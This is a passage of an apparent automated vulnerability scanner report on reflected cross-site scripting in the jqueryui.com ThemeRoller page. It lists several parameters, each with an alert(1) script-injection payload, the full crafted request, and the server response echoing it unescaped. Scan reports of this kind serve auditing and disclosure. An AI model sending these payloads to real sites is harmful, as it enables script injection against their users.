lay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b02"><script>alert(1)</script>bc2004c518 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20da2"><script>alert(1)</script>824c2520339 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefa
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4833c"><script>alert(1)</script>da123611499 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_fl
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da82"><script>alert(1)</script>6ab60c147ab was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHig
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdcf"><script>alert(1)</script>709d73031ae was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorC
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16685"><script>alert(1)</script>dd0f9a34ef1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120320

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%16685"><script>alert(1)</script>dd0f9a34ef1&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96a1"><script>alert(1)</script>5f3ea89b3c1 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120257

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=boldf96a1"><script>alert(1)</script>5f3ea89b3c1&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&b
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9339"><script>alert(1)</script>0658b12cb0b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCd9339"><script>alert(1)</script>0658b12cb0b&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a1c"><script>alert(1)</script>c4245844e06 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=0